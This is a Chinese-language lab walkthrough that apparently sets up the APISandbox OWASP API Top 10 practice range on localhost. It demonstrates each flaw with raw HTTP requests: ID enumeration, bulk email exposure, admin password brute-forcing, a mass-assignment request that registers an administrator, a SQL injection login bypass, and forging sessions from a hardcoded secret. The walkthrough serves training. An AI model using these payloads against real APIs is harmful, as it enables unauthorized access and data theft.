OWASPApiTop10靶场

wahaha2025-08-18文章来源:SecHub网络安全社区

OWASPApiTop10靶场

搭建

下载项目

wget [https://github.com/API-Security/APISandbox/archive/refs/heads/main.zip]
(https://github.com/API-Security/APISandbox/archive/refs/heads/main.zip) -O APISandbox-
main.zip
unzip APISandbox-main.zip
cd APISandbox-main

进入一个漏洞/环境的目录

cd OWASPApiTop10
cd docker

自动化编译环境

docker-compose build

启动整个环境

docker-compose up -d

靶场测试

API泄漏

访问首页会跳转到swagger-ui界面,泄漏了所有API。

http://127.0.0.1:58084/swagger/
![](https://secevery.oss-cn-beijing.aliyuncs.com/images/article/2024/12/20/1734666241519.png?x-oss-process=style/ImageWaterMark_V1.0)

API1: Broken object level authorization —失效的对象级授权

先做API4,通过爆破密码进行登录。

用户登录后, /v2/user/getuserinfo/:id API接口可以遍历用户信息。

GET /v2/user/getuserinfo/2 HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOV
hRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close
![](https://secevery.oss-cn-beijing.aliyuncs.com/images/article/2024/12/20/1734666353779.png?x-oss-process=style/ImageWaterMark_V1.0)
API2: Broken authentication—失效的用户认证
SecretKey: 0waspApiTop10

没有使用随机值,泄漏后可本地伪造鉴权,导致任意用户登录

gin的session在知道secret之后就可以任意伪造

这块可以和API7联动,API7泄露源码

API3: Excessive data exposure —过度的数据暴露

用户登录后,/v2/user/getuseremail可以获取全部用户邮箱信息,web前端只取当前用户ID的邮箱,过多的数据暴露。

GET /v2/user/getuseremail HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOV
hRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close

API4: Lack of resources and rate limiting —资源缺失 & 速率限制

/v2/login 可以爆破admin密码:123qweasd ,API接口未限制请求速率。

可以爆破admin密码:123qweasd

POST /v2/login HTTP/1.1
Host: 127.0.0.1:58084
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 42

{"username": "admin","password": "123456"}

API5: Broken function level authorization —功能级别授权已损坏

/v2/user/getuserprofile 返回自己的全部信息。

用户未知的情况下, /v2/user/getuserprofiles 返回全部用户信息。

GET /v2/user/getuserprofile HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOV
hRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close

API6: Mass assignment 批量分配

/v2/register

前端请求有隐藏的admin标签,可以手动加上, admin为true可以注册为管理员权限用户

POST /v2/register HTTP/1.1
Host: 127.0.0.1:58084
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 80

{"username": "test","password": "test","email": "test@test.com","admin": "true"}

API7: Security misconfiguration —安全性错误配置

/static

设置静态目录的时候设置到了上一级,导致可以下源码或者下载二进制文件。

API8: Injection —注入

/v2/login 存在sqlite注入,可以得到用户名密码

POST /v2/login HTTP/1.1
Host: 127.0.0.1:58084
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:58084/swagger/
Connection: close
Content-Length: 57

{
"username":"-1' or 1=1 --",
"pas
sword":"123qweasd"
}

API9: Improper assets management —资产管理不当

/v2/getenv 禁止访问

/v1/getenv 可以访问

由于开发历史遗留的API接口没有被取消,导致旧版本的API接口可以看到环境变量。

API10: Insufficient logging and monitoring— 日志和监控不足

没有日志,无法记录信息。